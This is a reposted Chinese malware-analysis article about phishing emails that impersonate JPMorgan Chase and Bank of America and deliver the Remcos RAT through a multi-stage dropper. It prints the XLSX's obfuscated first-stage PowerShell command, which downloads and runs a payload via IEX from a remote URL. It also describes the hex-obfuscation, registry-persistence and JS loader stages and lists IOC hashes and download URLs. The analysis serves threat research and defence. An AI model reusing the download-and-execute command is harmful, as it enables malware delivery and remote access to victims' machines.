前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >冒充银行钓鱼的Remcos RAT Dropper分析

冒充银行钓鱼的Remcos RAT Dropper分析

作者头像
FB客服
发布2022-02-24 13:57:11
5610
发布2022-02-24 13:57:11
举报
文章被收录于专栏:FreeBuf

近日,研究人员发现大量假借摩根大通银行和美国银行名义散发的钓鱼邮件,附件中会包含银行的名称和徽标。

△ 摩根大通银行

△ 美国银行

该恶意 XLSX 文件(c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915)会在启动时执行以下代码以加载第一阶段的 Payload。代码首先检查是否能够联网,接着下载并执行 Payload(3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71)。

代码语言:javascript
复制
ping google.com;b4df='olnwoD.)tnei' + 'lCb'; ,''gv6BNpMg30gwvPA=yekhtua&30212%3F148E16A9A6766D=diser&3F148E16A9A6766D=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';c3,we22 -Join '';IEX(([regex]::Matches(env:temp+ '\twt.vbs')

第一阶段的 Payload 会加载下一阶段的 Payload,脚本使用了较为简单的方法(字符转十六进制)来隐藏下一阶段的恶意 URL。

△ tweet.vs

下载的 Payload 会被写入注册表并在系统重启时启动恶意软件。

△ tvt.vbs

△ 第二阶段

第二阶段的 Payload 是 PowerShell 脚本:

△ PowerShell 脚本

攻击链的最后是一个 .js 脚本( ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd),其中包含一个可执行库文件。下图可见,代码中增加了许多垃圾内容进行混淆,在运行时用零替换不必要的字符串再启动动态链接库。

△ .JS 文件

提取数据后可以得到一个使用 C# 编写的可执行库文件,这就是最后投递的恶意样本( b7fd83f6d8bbd17d4aefa8f4e28d4503f1c4ab6ab70401b1a67e209da6197cde、73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1)。

该文件是 Remcos RAT 远控木马,攻击者可以通过该恶意软件获取未授权的远程访问能力。

IOC

代码语言:javascript
复制
c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915
87d78153d9d87c7e7e130feb052b1059837dcf6ebe0a128b75be75062ee11f9f
d874fc97e460e2c147782581d320f1673780ee99246286ce9d248c2a20a98773
7e97a402dfea6b367245ba7a7b7e9811a867e23d4a339f14f79a7420b5b6f5a6
b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35e
e37875bf204cb272dc38240363cc1e75929104b61ca0143441062b461ea8ce1f
08a1259090d5bf015cfd80caa7ac3ff5060ad503825ea5a5f010cec03178c157
hxxp://104.223.119.167/calient.jpg
hxxp://104.223.119.167/han.jpg
hxxp://64.188.19.241/na.jpg
hxxp://64.188.19.241/atc.jpg
hxxp://64.188.19.241/rtc.jpg
hxxp://64.188.19.241/ghini.vbs

参考来源

https://inquest.net/blog/2022/01/24/analysis-remcos-rat-dropper

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-02-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • IOC
  • 参考来源
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档